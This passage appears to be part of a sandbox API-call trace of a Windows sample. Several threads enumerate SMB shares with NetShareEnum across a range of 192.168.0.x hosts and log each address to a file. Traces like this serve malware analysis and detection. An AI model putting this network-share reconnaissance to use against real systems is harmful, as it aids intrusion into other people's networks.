lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.55", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.55", lpUsedDefaultChar=0x0) returned 14 [0089.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x681ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x681ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.149] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x681fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x681fc54*=0x10, lpOverlapped=0x0) returned 1 [0089.153] NetShareEnum (in: servername="\\\\192.168.0.55", level=0x1, bufptr=0x681fedc, prefmaxlen=0xffffffff, entriesread=0x681fed4, totalentries=0x681fed0, resume_handle=0x681fecc | out: bufptr=0x681fedc, entriesread=0x681fed4, totalentries=0x681fed0, resume_handle=0x681fecc) returned 0x35 [0144.427] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.110", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.427] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.110", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.110", lpUsedDefaultChar=0x0) returned 15 [0144.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x681ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.427] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.427] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x681ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.427] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.427] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.427] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x681fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x681fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.431] NetShareEnum (in: servername="\\\\192.168.0.110", level=0x1, bufptr=0x681fedc, prefmaxlen=0xffffffff, entriesread=0x681fed4, totalentries=0x681fed0, resume_handle=0x681fecc | out: bufptr=0x681fedc, entriesread=0x681fed4, totalentries=0x681fed0, resume_handle=0x681fecc) returned 0x35 [0178.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.160", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.160", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.160", lpUsedDefaultChar=0x0) returned 15 [0178.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x681ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.268] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x681ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.268] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.268] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.268] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x681fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x681fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.272] NetShareEnum (in: servername="\\\\192.168.0.160", level=0x1, bufptr=0x681fedc, prefmaxlen=0xffffffff, entriesread=0x681fed4, totalentries=0x681fed0, resume_handle=0x681fecc | out: bufptr=0x681fedc, entriesread=0x681fed4, totalentries=0x681fed0, resume_handle=0x681fecc) returned 0x35 [0211.209] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.243", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.209] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.243", cchWideChar=15, lpMultiByteStr=0x1e8320c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.243", lpUsedDefaultChar=0x0) returned 15 [0211.209] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x681fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x681fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.375] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x681ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.375] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x681ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.375] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.375] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x681fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x681fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.378] NetShareEnum (in: servername="\\\\192.168.0.243", level=0x1, bufptr=0x681fedc, prefmaxlen=0xffffffff, entriesread=0x681fed4, totalentries=0x681fed0, resume_handle=0x681fecc | out: bufptr=0x681fedc, entriesread=0x681fed4, totalentries=0x681fed0, resume_handle=0x681fecc) returned 0x35 [0258.078] SetEvent (hEvent=0x1dc) returned 1 [0258.078] RtlExitUserThread (Status=0x0) Thread: id = 77 os_tid = 0xce0 [0089.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.56", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.56", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.56", lpUsedDefaultChar=0x0) returned 14 [0089.154] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x695ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.154] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x695ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.154] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.154] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x695fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x695fc54*=0x10, lpOverlapped=0x0) returned 1 [0089.158] NetShareEnum (in: servername="\\\\192.168.0.56", level=0x1, bufptr=0x695fedc, prefmaxlen=0xffffffff, entriesread=0x695fed4, totalentries=0x695fed0, resume_handle=0x695fecc | out: bufptr=0x695fedc, entriesread=0x695fed4, totalentries=0x695fed0, resume_handle=0x695fecc) returned 0x35 [0144.415] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.109", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.415] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.109", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.109", lpUsedDefaultChar=0x0) returned 15 [0144.415] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x695ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.415] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.415] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x695ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.416] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x695fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x695fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.422] NetShareEnum (in: servername="\\\\192.168.0.109", level=0x1, bufptr=0x695fedc, prefmaxlen=0xffffffff, entriesread=0x695fed4, totalentries=0x695fed0, resume_handle=0x695fecc | out: bufptr=0x695fedc, entriesread=0x695fed4, totalentries=0x695fed0, resume_handle=0x695fecc) returned 0x35 [0178.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.159", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.159", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.159", lpUsedDefaultChar=0x0) returned 15 [0178.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x695ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x695ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.261] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.261] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x695fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x695fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.265] NetShareEnum (in: servername="\\\\192.168.0.159", level=0x1, bufptr=0x695fedc, prefmaxlen=0xffffffff, entriesread=0x695fed4, totalentries=0x695fed0, resume_handle=0x695fecc | out: bufptr=0x695fedc, entriesread=0x695fed4, totalentries=0x695fed0, resume_handle=0x695fecc) returned 0x35 [0211.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.252", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.252", cchWideChar=15, lpMultiByteStr=0x1e8332c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.252", lpUsedDefaultChar=0x0) returned 15 [0211.213] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x695fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x695fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x695ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x695ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.473] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x695fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x695fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.473] NetShareEnum (in: servername="\\\\192.168.0.252", level=0x1, bufptr=0x695fedc, prefmaxlen=0xffffffff, entriesread=0x695fed4, totalentries=0x695fed0, resume_handle=0x695fecc | out: bufptr=0x695fedc, entriesread=0x695fed4, totalentries=0x695fed0, resume_handle=0x695fecc) returned 0x35 [0258.001] SetEvent (hEvent=0x1dc) returned 1 [0258.001] RtlExitUserThread (Status=0x0) Thread: id = 78 os_tid = 0xce4 [0089.159] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.57", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.160] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.57", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.57", lpUsedDefaultChar=0x0) returned 14 [0089.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6a9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.160] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.160] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6a9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.160] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.160] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.160] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x6a9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6a9fc54*=0x10, lpOverlapped=0x0) returned 1 [0089.165] NetShareEnum (in: servername="\\\\192.168.0.57", level=0x1, bufptr=0x6a9fedc, prefmaxlen=0xffffffff, entriesread=0x6a9fed4, totalentries=0x6a9fed0, resume_handle=0x6a9fecc | out: bufptr=0x6a9fedc, entriesread=0x6a9fed4, totalentries=0x6a9fed0, resume_handle=0x6a9fecc) returned 0x35 [0144.881] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.126", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.881] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.126", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.126", lpUsedDefaultChar=0x0) returned 15 [0144.881] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6a9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.881] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.881] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.881] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6a9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.881] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.882] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.882] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6a9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, 